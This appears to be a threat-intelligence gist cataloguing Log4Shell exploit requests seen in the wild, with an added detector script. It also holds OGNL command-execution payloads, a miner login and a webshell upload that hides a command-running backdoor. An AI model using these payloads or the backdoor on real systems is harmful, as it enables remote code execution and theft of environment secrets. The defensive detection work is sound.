@nathanqthai
Last active March 30, 2023 12:54
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence

Samples

Enclosed are some sanitized samples of data GreyNoise has identified and collected related to exploitation of the Log4J vulnerability in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified whether any of these are effective. These examples are not comprehensive coverage of all the payloads GreyNoise has observed.

These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.

Examples

The following section includes Log4Shell samples seen in the wild.

URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

GET /?id=%27%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F%27%2B+argv%5B2%5D+%2B%27%2Fass%7D%27 HTTP/1.1
Host: <HOST>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: '${${::-j}ndi:rmi://'+ argv[2] +'/ass}'
User-Agent: '${${::-j}ndi:rmi://'+ argv[2] +'/ass}'

::- and lower: Interpolation

Two obfuscation examples:

GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://5.255.97.172:1389/a} HTTP/1.1
Host: <HOST>
Connection: close
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
GET /?q=${${lower:${lower:jndi}}:${lower:rmi}://5.255.97.172:1389/a} HTTP/1.1
Host: <HOST>
Connection: close
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36

Base64 Encoded in Authorization Header

GET parameter as well as encoded into the authorization header:

GET /?x=$%7Bjndi:ldap://ec725b34.dns.1433.eu.org%7D HTTP/1.1
Host: <IP_ADDRESS>:631
user-agent: ${jndi:ldap://ec725b34.dns.1433.eu.org}
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
authorization: Basic JHtqbmRpOmxkYXA6Ly9lYzcyNWIzNC5kbnMuMTQzMy5ldS5vcmd9OiR7am5kaTpsZGFwOi8vZWM3MjViMzQuZG5zLjE0MzMuZXUub3JnfQ==
referer: ${jndi:ldap://ec725b34.dns.1433.eu.org}

Decoded base64:

${jndi:ldap://ec725b34.dns.1433.eu.org}:${jndi:ldap://ec725b34.dns.1433.eu.org}

HEAD method

Any method could appear; we simply wanted to provide an example of a method that was not GET or POST:

HEAD /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: <IP_ADDRESS>:8545
Connection: close
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
X-Forwarded-For: ${jndi:ldap://X-Forwarded-For.c6qtab5mk1u0ihtclet0cg47m7aeoyjro.interact.sh/x}

DNS

GET /$%7Bjndi:dns://45.83.64.1/securityscan-http664%7D HTTP/1.1
Host: <IP_ADDRESS>:664
User-Agent: ${jndi:dns://45.83.64.1/securityscan-http664}
Referer: ${jndi:dns://45.83.64.1/securityscan-http664}
X-Api-Version: ${jndi:dns://45.83.64.1/securityscan-http664}
Accept-Encoding: gzip

RMI

GET /$%7Bjndi:ldap://67.205.191.102:1389/jxjrbt%7D HTTP/1.1
Host: <HOST>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: ${jndi:rmi://67.205.191.102:1099/djf6hl}

IIOP

GET /$%7Bjndi:iiop://128.90.61.199:10834/1639501300%7D HTTP/1.1
Host: <IP_ADDRESS>:443
Connection: close
Accept-Encoding: gzip
Connection: TE, close
Referer: ${jndi:iiop://128.90.61.199:10834/1639501300}
Te: deflate,gzip;q=0.3
User-Agent: ${jndi:iiop://128.90.61.199:10834/1639501300}
X-Api-Version: ${jndi:iiop://128.90.61.199:10834/1639501300}

LDAPS

GET /$%7Bjndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b%7D?${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b} HTTP/1.1
Host: <IP_ADDRESS>:443
Connection: close
Accept-Encoding: gzip
Cache-Control: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
Connection: close
Cookie: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
User-Agent: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
X-Leakix: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}

Brute Force HTTP Check

We noticed some of these going around that attempt to be a catch-all; note the parameters and the POST body:

POST /global-protect/login.esp?v=%24%7Bjndi%3Armi%3A%2F%2F<IP_ADDRESS>.5f3gyn.dnslog.cn%7D HTTP/1.1
Host: <IP_ADDRESS>:8081
Accept: */*
Accept-Charset: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Accept-Datetime: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Accept-Encoding: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Accept-Language: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Cache-Control: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Connection: keep-alive
Content-Length: 298
Content-Type: application/json
Cookie: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Dnt: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded-For-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded-Proto: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
From: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Max-Forwards: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Origin: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Pragma: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Referer: https://${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Te: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
True-Client-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Upgrade: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
User-Agent: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Via: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Warning: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Api-Version: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Att-Deviceid: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Correlation-Id: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Csrf-Token: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Csrftoken: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Do-Not-Track: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Foo: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Foo-Bar: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forward-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forward-Proto: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-By: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-For-Original: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Host: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Port: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Proto: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Protocol: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Scheme: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Server: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Ssl: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarder-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Frame-Options: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-From: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Geoip-Country: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Destinationurl: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Host-Override: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Method: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Method-Override: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Path-Override: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Https: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Htx-Agent: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Hub-Signature: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-If-Unmodified-Since: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Imbo-Test-Config: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Insight: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Ip-Trail: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Proxyuser-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Request-Id: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Requested-With: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Uidh: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Wap-Profile: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Xsrf-Token: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}

{"username": "${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}", "user": "${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}", "email": "${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}", "email_address": "${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}", "password": "${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}"}

Base64 Encoded Into Parameter

GreyNoise noticed a particular attacker evolve their techniques. There was initially basic exploitation via a header:

GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: <IP_ADDRESS>:2375
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Waterfox/91.4.0
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:ldap://jobs3734.log.helicopter-crash.online:443/file}

This later evolved into base64-encoding the payload into a parameter, which completely obfuscates it and bypasses most Log4J-related WAF rules:

GET /websso/SAML2/SSOSSL/vsphere.local?RelyingPartyEntityId=JHskezo6LWp9bmRpOnJtaTovLzQ1Ljc3LjEyNC42MTo0NDMvUkF9 HTTP/1.1
Host: <HOST>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 6812.88.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.153 Safari/537.36

Decoded base64:

${${::-j}ndi:rmi://45.77.124.61:443/RA}

We saw a variant of this where the payload was a bit more sophisticated in its use of bypasses:

GET /websso/SAML2/SSOSSL/vsphere.local?RelyingPartyEntityId=JHskezo6LWp9bmRpOmxkYXA6Ly80NS43Ny4xMjQuNjE6NDQzLyMzZDJmMjc3MjczNzQ3ODVmZGVlMjkyYjI0Nzg2MjFkZF86O18ke2VudjpQQVRIfV86O18ke2VudjpVU0VSfV86O18ke2VudjpVU0VSTkFNRX1fOjtfJHtlbnY6SE9TVE5BTUV9Xzo7XyR7ZW52OlVTRVJETlNET01BSU59Xzo7XyR7ZW52OkNPTVBVVEVSTkFNRX1fOjtfJHtidW5kbGU6YXBwbGljYXRpb246c3ByaW5nLmRhdGFzb3VyY2UudXJsfV86O18ke3N5czpqYXZhLnZlcnNpb259fQ== HTTP/1.1
Host: <IP_ADDRESS>:8081
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36

Decoded base64:

${${::-j}ndi:ldap://45.77.124.61:443/#3d2f27727374785fdee292b2478621dd_:;_${env:PATH}_:;_${env:USER}_:;_${env:USERNAME}_:;_${env:HOSTNAME}_:;_${env:USERDNSDOMAIN}_:;_${env:COMPUTERNAME}_:;_${bundle:application:spring.datasource.url}_:;_${sys:java.version}}

Common False Positives

This section provides samples of some false positives that may appear with overly broad matching patterns.

OGNL

Variations on OGNL exploits show up fairly often due to their relation to Java and because they share many similar fingerprinting bypasses.

GET /%25%7b(%23dm%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context['com.opensymphony.xwork2.ActionContext.container']).(%23ognlUtil%3d%23container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3d'ping%208z8usjxsanw60xuueazmq5e1isoic7.burpcollaborator.net%20-c1').(%23iswin%3d(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3d(%23iswin%3f%7b'cmd.exe'%2c'/c'%2c%23cmd%7d%3a%7b'/bin/bash'%2c'-c'%2c%23cmd%7d)).(%23p%3dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3d%23p.start()).(@org.apache.commons.io.IOUtils@toString(%23process.getInputStream()))%7d/portal/js/html5shiv.min.js HTTP/1.1
Host: <IP_ADDRESS>:443
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36

JSONRPC

This false positive can potentially be avoided by looking for jsonrpc.

{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42m9nqbb2aL9TTYHUeBrz8VactZAbtMBzdTjdoofR5XNGRa9H1Mcxenat3vZazj9s9bLJq31ugJFKKWYSLKznsQHCLgEJfo","pass":"x","agent":"XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}
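The obfuscation and encoding variants above (the `::-` and `lower:` interpolation, the base64 in the Authorization header, the base64 in the RelyingPartyEntityId parameter) and the false positives in this section can all be exercised by one normalizing detector. The following is an added example written for this page, not GreyNoise tooling: it percent-decodes and base64-decodes every field of a raw request, folds the lookup forms back into the literal `${jndi:...}`, and reports scheme and target, while leaving the OGNL and JSON-RPC samples unflagged. The sample requests are the gist's own samples trimmed to the headers that matter (the OGNL request line and JSON-RPC body are abridged, and the JSON-RPC request line is constructed); folding `${upper:...}` the same way as `${lower:...}` is an assumption beyond what the page shows.

```python
import base64
import json
import re
from urllib.parse import unquote

# Lookup forms used above to split up the literal "jndi":
#   ${::-j}        -> "j"    (no key resolves, so the ":-" default value is used)
#   ${lower:jndi}  -> "jndi"
# ${upper:...} is folded the same way (assumption: a real Log4j lookup, not shown on this page).
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# Once folded, every live payload on this page reduces to ${jndi:<scheme>://<target>...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:(?://)?([^}/\s]*)", re.IGNORECASE)
# Long base64-looking runs, as in the Authorization header and RelyingPartyEntityId samples
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

def fold_lookups(text):
    """Collapse nested ${::-x} / ${lower:x} lookups innermost-first until nothing changes:
    `${${::-j}ndi:rmi://h}` and `${${lower:${lower:jndi}}:${lower:rmi}://h}` both
    become `${jndi:rmi://h}`."""
    previous = None
    while previous != text:
        previous = text
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
        text = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
    return text

def decode_layers(value):
    """Yield a field as received, percent-decoded (twice, to catch double encoding),
    and every base64 run inside those forms decoded back to text."""
    seen = []
    layer = value
    for _ in range(3):
        if layer in seen:
            break
        seen.append(layer)
        yield layer
        layer = unquote(layer)
    for candidate in list(seen):
        for token in _B64_TOKEN.findall(candidate):
            try:  # pad to a multiple of 4; binascii.Error (a ValueError) means "not base64"
                decoded = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
            except ValueError:
                continue
            text = decoded.decode("utf-8", "replace")
            if text not in seen:
                seen.append(text)
                yield text

def scan_request(raw):
    """Split a raw HTTP request into request line, headers and body, push every field
    through decode_layers and fold_lookups, and return (field, scheme, target) triples."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    fields = [("request-line", lines[0])]
    for line in filter(None, lines[1:]):
        name, _, value = line.partition(":")
        fields.append((name.strip().lower(), value.strip()))
    if body.strip():
        fields.append(("body", body))
    findings = []
    for field, value in fields:
        for layer in decode_layers(value):
            for m in _JNDI.finditer(fold_lookups(layer)):
                hit = (field, m.group(1).lower(), m.group(2))
                if hit not in findings:
                    findings.append(hit)
    return findings

def is_jsonrpc(body):
    """The JSON-RPC false positive above: a body that parses as JSON with a "jsonrpc" key."""
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    return isinstance(doc, dict) and "jsonrpc" in doc

# Sample requests: the gist's own samples, trimmed to the headers that matter.
INTERPOLATED = ("GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://5.255.97.172:1389/a} HTTP/1.1\n"
                "Host: <HOST>\n")
BASIC_AUTH = ("GET /?x=$%7Bjndi:ldap://ec725b34.dns.1433.eu.org%7D HTTP/1.1\n"
              "Host: <IP_ADDRESS>:631\n"
              "authorization: Basic JHtqbmRpOmxkYXA6Ly9lYzcyNWIzNC5kbnMuMTQzMy5ldS5vcmd9OiR7am5kaTpsZGFwOi8vZWM3MjViMzQuZG5zLjE0MzMuZXUub3JnfQ==\n")
B64_PARAM = ("GET /websso/SAML2/SSOSSL/vsphere.local?RelyingPartyEntityId=JHskezo6LWp9bmRpOnJtaTovLzQ1Ljc3LjEyNC42MTo0NDMvUkF9 HTTP/1.1\n"
             "Host: <HOST>\n")
# False positives: the OGNL probe (abridged) and the XMRig JSON-RPC login (body abridged, request line constructed)
OGNL = ("GET /%25%7b(%23dm%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm))%7d/portal/js/html5shiv.min.js HTTP/1.1\n"
        "Host: <IP_ADDRESS>:443\n")
JSONRPC = ("POST / HTTP/1.1\nHost: <IP_ADDRESS>\nContent-Type: application/json\n\n"
           '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42m9nqbb2aL9TTYHUeBrz8VactZAbtMBzdTjdoofR5XNGRa9H1Mcxenat3vZazj9s9bLJq31ugJFKKWYSLKznsQHCLgEJfo","pass":"x","agent":"XMRig/6.15.3"}}')

if __name__ == "__main__":
    for name, request in [("interpolated", INTERPOLATED), ("basic-auth", BASIC_AUTH),
                          ("b64-param", B64_PARAM), ("ognl", OGNL), ("jsonrpc", JSONRPC)]:
        print(name, scan_request(request) or "no ${jndi:} lookup found")
```

Run as a script it prints one line per sample. The order of operations is the point: decode first, fold second, match last. None of the three live samples above contains the literal bytes `${jndi:` anywhere in the request, so a rule that only searches the raw request for that string reports nothing for any of them, while the OGNL and JSON-RPC requests stay clean after every decoding layer.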

Random Webshell Upload Attempt

I don't know what to say about this...

POST /logupload?logMetaData={"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://1.u113ft0k.03jxxe.dnslog.cn/miao5"}}""},"b":{{"@type":"java.net.URL","val":"http://1.u113ft0k.03jxxe.dnslog.cn/miao6"}:"x"},"c":{{"@type":"java.net.URL","val":"http://1.u113ft0k.03jxxe.dnslog.cn/miao7"}:0,"d":Set[{"@type":"java.net.URL","val":"http://1.u113ft0k.03jxxe.dnslog.cn/miao8"}],"e":Set[{"@type":"java.net.URL","val":"http://1.u113ft0k.03jxxe.dnslog.cn/miao9"},} HTTP/1.1
Host: <IP_ADDRESS>:8443
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 4411
Content-Type: multipart/form-data; boundary=7ddcdf06c9de6031e144846ebacf8cde
User-Agent: python-requests/2.25.1

--7ddcdf06c9de6031e144846ebacf8cde
Content-Disposition: form-data; name="logfile"; filename="upload.txt"

#! /usr/bin/env python3
import cgi
import os,sys,subprocess
import logging
import json

WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME = "workload_log_{}.zip"

class LogFileJson:
    """ Defines format to upload log file in harness
    Arguments:
    itrLogPath : log path provided by harness to store log data
    logFileType : Type of log file defined in api.agentlogFileType
    workloadID [OPTIONAL] : workload id, if log file is workload specific
    """
    def __init__(self, itrLogPath, logFileType, workloadID = None):
        self.itrLogPath = itrLogPath
        self.logFileType = logFileType
        self.workloadID = workloadID

    def to_json(self):
        return json.dumps(self.__dict__)

    @classmethod
    def from_json(cls, json_str):
        json_dict = json.loads(json_str)
        return cls(**json_dict)

class agentlogFileType():
    """ Defines various log file types to be uploaded by agent
    """
    WORKLOAD_ZIP_LOG = "workloadLogsZipFile"

try:
    # TO DO: Puth path in some config
    logging.basicConfig(filename="/etc/httpd/html/logs/uploader.log",filemode='a', level=logging.ERROR)
except:
    # In case write permission is not available in log folder.
    pass

logger = logging.getLogger('log_upload_wsgi.py')

def application(environ, start_response):
    logger.debug("application called")

    if environ['REQUEST_METHOD'] == 'POST':
        post = cgi.FieldStorage(
            fp=environ['wsgi.input'],
            environ=environ,
            keep_blank_values=True
        )

        # TO DO: Puth path in some config or read from config is already available
        resultBasePath = "/etc/httpd/html/vpresults"
        try:
            filedata = post["logfile"]
            metaData = post["logMetaData"]

            if metaData.value:
                logFileJson = LogFileJson.from_json(metaData.value)

            if not os.path.exists(os.path.join(resultBasePath, logFileJson.itrLogPath)):
                os.makedirs(os.path.join(resultBasePath, logFileJson.itrLogPath))

            if filedata.file:
                if (logFileJson.logFileType == agentlogFileType.WORKLOAD_ZIP_LOG):
                    filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME.format(str(logFileJson.workloadID)))
                else:
                    filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, logFileJson.logFileType)
                with open(filePath, 'wb') as output_file:
                    while True:
                        data = filedata.file.read(1024)
                        # End of file
                        if not data:
                            break
                        output_file.write(data)

                body = u" File uploaded successfully."
                start_response(
                    '200 OK',
                    [
                        ('Content-type', 'text/html; charset=utf8'),
                        ('Content-Length', str(len(body))),
                    ]
                )
                return [body.encode('utf8')]

        except Exception as e:
            logger.error("Exception {}".format(str(e)))
            body = u"Exception {}".format(str(e))
    else:
        if environ['REQUEST_METHOD'] == 'GET':
            post = cgi.FieldStorage(
                fp=environ['wsgi.input'],
                environ=environ,
                keep_blank_values=True
            )
            if post["key"].value == "hell0W0rld":
                command = post[""baby""].value
                proc = subprocess.run(command, shell=True,stdout=subprocess.PIPE)
                body = proc.stdout.decode("utf-8")
                start_response(
                        '200 OK',
                        [
                            ('Content-type', 'text/html; charset=utf8'),
                            ('Content-Length', str(len(body))),
                        ]
                    )
                return [body.encode('utf8')]
        logger.error("Invalid request")
        body = u"Invalid request"

    start_response(
        '400 fail',
        [
            ('Content-type', 'text/html; charset=utf8'),
            ('Content-Length', str(len(body))),
        ]
    )
    return [body.encode('utf8')]
--7ddcdf06c9de6031e144846ebacf8cde--

Misc

GET //${%23context['xwork.MethodAccessor.denyMethodExecution']=!(%23_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('id').waitFor()}.action HTTP/1.1
Host: <HOST>
Connection: close
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Cache-Control: no-cache
Connection: Close
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)